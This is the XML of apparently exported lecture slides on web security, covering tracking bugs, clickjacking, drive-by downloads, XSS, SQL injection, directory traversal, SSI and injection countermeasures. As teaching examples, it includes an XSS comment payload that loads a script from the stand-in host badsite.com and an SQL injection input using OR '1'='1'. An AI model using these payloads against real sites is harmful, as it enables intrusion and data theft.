                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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23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199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="0"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Fake Code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2587890625" w:line="199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="0"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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6102351" cy="4821683"/>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02351" cy="482168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24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40.0856018066406"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Tracking Bug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333251953125" w:line="231.90716743469238" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="1310.38085937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Some advertisers want to count number of visitors and  number of times each visitor arrives at a site.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They can do this by a combination of cookies and an  invisible image.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25244140625" w:line="215.9103012084961" w:lineRule="auto"/>
        <w:ind w:left="829.3703460693359" w:right="663.90380859375" w:hanging="278.8663482666015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web bug, also called a clear GIF, 1x1 GIF, or tracking  bug, is a tiny image, as small as 1 pixel by 1 pixel  (depending on resolution, screens display at least 100 to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200 pixels per inch), an image so small it will not normally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be seen.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285400390625" w:line="231.90719604492188" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="1065.41992187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It is loaded and processed the same as a larger picture.  Part of the processing is to notify the bug‘s owner,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advertiser, who thus learns that another user has  loaded the advertising image.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625610351562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25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40.0856018066406"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Tracking Bug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23.5999298095703" w:right="611.50268554687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single company can do the same thing without the need  for a web bug.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40412902832" w:lineRule="auto"/>
        <w:ind w:left="834.1599273681641" w:right="819.49951171875" w:hanging="283.65592956542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If you order flowers online, the florist can obtain your IP  address and set a cookie containing your details so as to  recognize you as a repeat customer.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38427734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344"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web bug allows this tracking across multiple merchants.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3.440246582031"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26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40.0856018066406"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Tracking Bug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009033203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5485.17578125" w:firstLine="0"/>
        <w:jc w:val="righ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Web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1357421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5412.04833984375" w:firstLine="0"/>
        <w:jc w:val="righ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bugs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0408935546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3526.585006713867" w:right="0" w:firstLine="0"/>
        <w:jc w:val="lef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Florist Bakery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4573974609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3801.1165618896484" w:right="0" w:firstLine="0"/>
        <w:jc w:val="lef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1 2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7.510604858398" w:right="0" w:firstLine="0"/>
        <w:jc w:val="lef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Targeted ad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7584228515625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="6469.104232788086" w:right="0" w:firstLine="0"/>
        <w:jc w:val="lef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3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2.5218963623047" w:right="0" w:firstLine="0"/>
        <w:jc w:val="lef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Visit from 200.100.1.10 Visit from 200.100.1.10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43798828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5947.461166381836" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25.8050479888916"/>
          <w:szCs w:val="25.8050479888916"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25.8050479888916"/>
          <w:szCs w:val="25.8050479888916"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ClicksRUs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5738372802734"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27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40.0856018066406"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Tracking Bug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23.5999298095703" w:right="639.49829101562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Florist might subscribe to a web tracking service, which we name ClicksRUs.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40412902832" w:lineRule="auto"/>
        <w:ind w:left="822.1599578857422" w:right="638.858642578125" w:hanging="271.6559600830078"/>
        <w:jc w:val="both"/>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florist includes a web bug in its web image, so when you load that page, your details are sent to ClicksRUs, which then installs a cookie.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38427734375" w:line="239.98735427856445" w:lineRule="auto"/>
        <w:ind w:left="832.239990234375" w:right="638.29833984375" w:hanging="281.7359924316406"/>
        <w:jc w:val="both"/>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If you leave the florist‘s web site and next go to a bakery‘s site that also subscribes to tracking with ClicksRUs, the new page will also have a ClicksRUs web bug.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6536865234375" w:line="239.90396976470947" w:lineRule="auto"/>
        <w:ind w:left="822.1599578857422" w:right="637.098388671875" w:hanging="271.6559600830078"/>
        <w:jc w:val="both"/>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This time,, ClicksRUs retrieves its old cookie, finds that you were last at the florist‘s site, and records the coincidence of these two firms. After correlating these data points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0320892333984"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28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40.0856018066406"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Tracking Bug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40412902832" w:lineRule="auto"/>
        <w:ind w:left="848.0799865722656" w:right="935.5810546875" w:hanging="297.57598876953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ClicksRUs can inform the florist and the bakery that they  have common customers and might develop a joint  marketing approach.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94115447998" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="535.981445312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Or ClicksRUs can determine that you went from florist A to  florist B to florist C and back to florist A, so it can report to  them that B and C lost out to A, helping them all develop  more successful marketing strategies.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080078125" w:line="251.89913749694824" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="557.7404785156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Or ClicksRUs can infer that you are looking for a gift and  will offer a targeted ad on the next site you visit.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ClicksRUs might receive advertising revenue from florist  D and trinket merchant E, which would influence the ads it  will display to you.</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0416870117188"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29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Clickjacking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4913330078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3483.03955078125" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do you want to perform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59912109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4042.789306640625" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this dangerous act?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4940185546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4584.7491455078125" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Yes] [No]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6929931640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3071.9664764404297" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For a Free Prize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3359375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4289.216232299805" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click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130920410156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4200.211410522461" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56.98015213012695"/>
          <w:szCs w:val="56.98015213012695"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Here]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2812957763672"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30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Clickjacking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33.6799621582031" w:right="2450.458984375" w:hanging="283.175964355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Clickjacking: Tricking a user into clicking a link by  disguising what the link points to.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415573120117" w:lineRule="auto"/>
        <w:ind w:left="834.1599273681641" w:right="2026.3818359375" w:hanging="283.65592956542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clickjacking attack succeeds because of what the  attacker can do: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89823913574" w:lineRule="auto"/>
        <w:ind w:left="832.7199554443359" w:right="723.1787109375" w:hanging="282.2159576416015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choose and load a page with a confirmation box that  commits the user to an action with one or a small number  of mouse clicks (for example, ―Do you want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38525390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344"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to install this program? [Yes] [Cancel]‖)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87.88482666015625" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="3069.10156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change the image‘s coloring to transparent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move the image to any position on the screen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70288085937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31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Clickjacking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40412902832" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="616.3012695312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two technical tasks, changing the color to transparent  and moving the page, are both possible because of a  technique called framing, or using an iframe.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94115447998" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="1117.90161132812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An iframe is a structure that can contain all or part of a  page, can be placed and moved anywhere on another  page, and can be layered on top of or underneath other  frames.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8320312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32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3.712387084960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Drive-By Download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35.5999755859375" w:right="2286.221923828125" w:hanging="285.0959777832031"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>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Code is downloaded, installed, and executed on a  computer without the user‘s knowledge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415573120117"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May be the result of clickjacking, fake code, program  download subsitution, etc.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313232421875" w:line="383.68125915527344"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292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="8507476" cy="1279017"/>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8507476" cy="1279017"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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33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3.712387084960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Drive-By Download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3330078125" w:line="239.68616008758545" w:lineRule="auto"/>
        <w:ind w:left="834.4959259033203" w:right="2077.19482421875" w:hanging="285.772705078125"/>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Downloading and installing code other than what a user  expects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01025390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="535.0456237792969" w:right="0" w:firstLine="0"/>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Among the changes he detected were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527099609375" w:line="287.62367248535156" w:lineRule="auto"/>
        <w:ind w:left="552.2212219238281" w:right="1774.752197265625" w:firstLine="0"/>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 eight new programs from at least four different companies • nine new directories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37939453125" w:line="287.6232719421387" w:lineRule="auto"/>
        <w:ind w:left="552.2212219238281" w:right="1349.996337890625" w:firstLine="0"/>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 three new browser toolbars (including the interesting toolbar • numerous new desktop icons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4794921875" w:line="239.68605995178223" w:lineRule="auto"/>
        <w:ind w:left="542.9727935791016" w:right="529.4873046875" w:firstLine="9.248428344726562"/>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 an addition to the bottom of the Save As dialog box, offering the  opportunity to buy a computer accessory and take part in a  survey to enter a sweepstakes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2918701171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="552.2212219238281" w:right="0" w:firstLine="0"/>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 numerous new Favorites entries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533203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="552.2212219238281" w:right="0" w:firstLine="0"/>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 a new browser start page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6531524658203"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34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0.0955963134766"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Obtaining User or Website Data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98406982422" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="925.42236328125" w:hanging="273.09593200683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Someone interested in obtaining unauthorized data from  the background database server crafts and passes SQL  commands to the server through the web interface.  Similar attacks involve writing scripts in Java.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96976470947" w:lineRule="auto"/>
        <w:ind w:left="833.6799621582031" w:right="740.621337890625" w:hanging="283.175964355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These attacks are called scripting or injection attacks  because the unauthorized request is delivered as a script  or injected into the dialog with the server.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8320312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35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Cross-Site Scripting (XSS)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98406982422"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Executable code is included in the interaction between  client and server and executed by the client or server.  consider a simple command to the search engine Google.  The user enters a simple text query,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5948791503906"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but handlers add commands along the way to the server,  so what starts as a simple string becomes a structure that  Google can use to interpret or refine the search, or that  the user‘s browser can use to help display the results.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091064453125" w:line="239.9040412902832"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So, for example, a Google search on the string ―cross site  scripting‖ becomes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319519042969" w:line="263.76111030578613"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292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6905625" cy="7620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905625" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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36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Cross-Site Scripting (XSS)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330078125" w:line="215.71768283843994" w:lineRule="auto"/>
        <w:ind w:left="842.4231719970703" w:right="1041.0693359375" w:hanging="293.699951171875"/>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Sometimes,, the interaction is not directly between the user‘s  browser and one web site.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17431640625" w:line="215.71749687194824" w:lineRule="auto"/>
        <w:ind w:left="823.0455780029297" w:right="570.999755859375" w:hanging="274.3223571777344"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="44.08000183105469"/>
          <w:szCs w:val="44.08000183105469"/>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Many web sites offer access to outside services without leaving  the site. For example, television station KCTV in Kansas City  has a website with a search engine box so that a user can  search within the site or on the web. In this case, the Google  search result is displayed within a KCTV web page a  convenience to the user and a marketing advantage for KCTV  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="44.08000183105469"/>
          <w:szCs w:val="44.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(because the station keeps the user on its web site).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143798828125" w:line="215.717511177063" w:lineRule="auto"/>
        <w:ind w:left="832.2939300537109" w:right="554.17236328125" w:hanging="283.5707092285156"/>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The search query is loaded with parameters to help KCTV  display the results; Google interprets the parameters for it and  returns the remaining parameters unread and unmodified in the  result to KCTV.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143798828125" w:line="215.71753978729248" w:lineRule="auto"/>
        <w:ind w:left="834.4959259033203" w:right="973.017578125" w:hanging="285.772705078125"/>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These parameters become a script attached to the query and  executed by any responding party along the way.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114715576172"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37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Cross-Site Scripting (XSS)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49.0399932861328" w:right="816.46240234375" w:hanging="298.535995483398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Tricking a client or server into executing scripted code by  including the code in data inputs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40412902832" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="852.462158203125" w:hanging="273.09593200683594"/>
        <w:jc w:val="both"/>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Scripts and HTML tags are encoded as plaintext just like  user inputs, so they can take over web pages similarly to  the way buffer overflow attacks can take over programs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8316040039062" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="577.3600006103516" w:right="2098.69873046875" w:hanging="18.720016479492188"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cool&lt;br&gt;story.&lt;br&gt;KCTVBigFan&lt;script  src=http://badsite.com/xss.js&gt;&lt;/script&gt;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0319213867188"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38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8.099594116210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SQL Injection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34.1599273681641" w:right="2441.741943359375" w:hanging="283.65592956542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Injecting SQL code into an exchange between an  application and its database server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40" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>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Example: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401123046875" w:line="240.14399528503418" w:lineRule="auto"/>
        <w:ind w:left="0"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Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input field: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263427734375" w:line="316.72717094421387" w:lineRule="auto"/>
        <w:ind w:left="0"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27.240001678466797"/>
          <w:szCs w:val="27.24000167846679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292934"/>
          <w:sz w:val="32.040000915527344"/>
          <w:szCs w:val="32.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; " </w:t>
      </w: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The same query with malicious user input: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2064819335938"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93a299"/>
          <w:sz w:val="27.240001678466797"/>
          <w:szCs w:val="27.24000167846679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292934"/>
          <w:sz w:val="32.08000183105469"/>
          <w:szCs w:val="32.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; " </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39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3.712387084960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Dot-Dot-Slash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40412902832"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Also known as ―directory traversal,‖ this is when attackers  use the term ―../‖ to access files that are on the target web  server but not meant to be accessed from outside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89823913574" w:lineRule="auto"/>
        <w:ind w:left="0"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Most commonly entered into the URL bar but may also be  combined with other attacks, such as XSS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872314453125" w:line="945.5960655212402" w:lineRule="auto"/>
        <w:ind w:left="0"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292934"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="8326755" cy="547345"/>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326755" cy="547345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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40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8.0995941162109"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Server-Side Include (SSI)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40412902832" w:lineRule="auto"/>
        <w:ind w:left="836.0799407958984" w:right="1063.25927734375" w:hanging="285.575942993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SSI is an interpreted server-side scripting language that  can be used for basic web server directives, such as  including files and executing commands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89823913574" w:lineRule="auto"/>
        <w:ind w:left="834.1599273681641" w:right="667.181396484375" w:hanging="283.655929565429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As is the case with XSS, some websites are vulnerable to  allowing users to execute SSI directives through text input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4323120117188" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3094.280014038086"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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4686300" cy="4318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6863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8399658203125"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41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64.0975952148438"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Countermeasures to Injections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40" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344"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Filter and sanitize all user input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401123046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328"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Need to account for every potentially valid encoding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666748046875" w:line="239.90415573120117" w:lineRule="auto"/>
        <w:ind w:left="849.0399932861328" w:right="1223.502197265625" w:hanging="298.535995483398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Make no assumptions about the range of possible user  inputs—trust nothing, check everything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76949310303" w:lineRule="auto"/>
        <w:ind w:left="831.7599487304688" w:right="1546.54296875" w:hanging="281.25595092773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Use access control mechanisms on backend servers,  such as ―stored procedures‖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3.632507324219"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42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7.7143859863281"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Email Attacks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39.90389823913574" w:lineRule="auto"/>
        <w:ind w:left="848.0799865722656" w:right="1497.581787109375" w:hanging="297.57598876953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An attacker can attempt to fool people with fake email  messages.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91015625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="832.239990234375" w:right="1436.700439453125" w:hanging="281.735992431640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Spam, fictitious or misleading email, offers to buy  designer watches, or hot stocks, as well as get-rich  schemes involving money in overseas bank accounts.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38427734375" w:line="239.98735427856445" w:lineRule="auto"/>
        <w:ind w:left="833.6799621582031" w:right="1168.1396484375" w:hanging="283.175964355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Similar false messages try to get people to click to  download a browser enhancement or even just click for  more detail.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6536865234375" w:line="255.8975601196289" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="1408.459472656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Spammers now use more realistic topics for false  messages to entice recipients to follow a malicious link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Eg. current events messages (―Want more details on  [sporting event, political race,crisis]?‖)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448944091797"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7.64160156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43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72998046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="597.7143859863281"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Email Spam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327392578125" w:line="287.8850269317627" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="1578.22143554687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Experts estimate that 60% to 90% of all email is spam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Types of spam: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923828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328"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Advertising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6708984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1410.0519561767578"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93a299"/>
          <w:sz w:val="32.400001525878906"/>
          <w:szCs w:val="32.400001525878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Pharmaceuticals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94189453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1410.0519561767578"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93a299"/>
          <w:sz w:val="32.400001525878906"/>
          <w:szCs w:val="32.400001525878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Stocks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0" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328"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Malicious code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6705322265625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328"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Links for malicious websites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666748046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="550.5252075195312" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
